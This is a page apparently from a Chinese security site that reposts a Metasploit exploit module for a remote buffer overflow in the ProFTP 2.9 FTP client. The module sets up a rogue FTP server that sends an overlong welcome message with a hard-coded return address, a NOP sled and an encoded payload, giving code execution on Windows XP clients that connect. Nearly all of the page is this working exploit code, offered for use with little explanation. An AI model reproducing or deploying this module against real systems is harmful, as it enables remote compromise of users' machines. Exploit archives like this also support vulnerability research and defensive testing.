首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ProFTP 2.9 (welcome message) Remote Buffer Overflow Exploit (meta)
来源:his0k4.hlm[at]gmail.com 作者:His0k4 发布时间:2009-08-26  

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


class Metasploit3 < Msf::Exploit::Remote

 include Msf::Exploit::Remote::TcpServer

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'ProFTP 2.9 (welcome message) Remote Buffer Overflow Exploit',
   'Description'    => %q{
    This module exploits a buffer overflow in the ProFTP 2.9
    client that is triggered through an excessively long welcome message.
   },
   'Author'   => [ 'His0k4 <his0k4.hlm[at]gmail.com>' ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision$',
   'References'     =>
    [
     [ 'URL', 'http://www.labtam-inc.com/index.php?act=products&pid=1' ],
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'seh',
    },
   'Payload'        =>
    {
     'Space'    => 1000,
     'BadChars' => "\x00\x0a\x0d\x20",
     'StackAdjustment' => -3500,
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
    # Tested against- xp sp3 en OK.
     [ 'Universal',  { 'Ret' => 0x6809d408 } ], # WCMDPA10
    ],
   'Privileged'     => false,
   'DefaultTarget'  => 0))

  register_options(
   [
    OptPort.new('SRVPORT', [ true, "The FTP daemon port to listen on", 21 ]),
   ], self.class)
 end

 def on_client_connect(client)
  return if ((p = regenerate_payload(client)) == nil) 

  buffer =  "220 "
  buffer << rand_text_numeric(2064)
  buffer << [target.ret].pack('V')
  buffer << make_nops(20)
  buffer << payload.encoded
  buffer << "\r\n"
  client.put(buffer)
 end
 
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Adobe Reader version 8.0.0 den
·Media Jukebox 8 ( .M3U) Univer
·PDFZilla version 1.0.8 Active-
·Linux Kernel <= 2.6.31-rc7 AF_
·RM Downloader local stack over
·Xerox WorkCentre Multiple Mode
·AiO ( All into One) Flash Mixe
·Cerberus FTP 3.0.1 (ALLO) Remo
·FLIP Flash Album Deluxe 1.8.40
·Novell Client for Windows 2000
·Audacity <= 1.2 (.gro File) Un
·Lotus note connector for Black
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved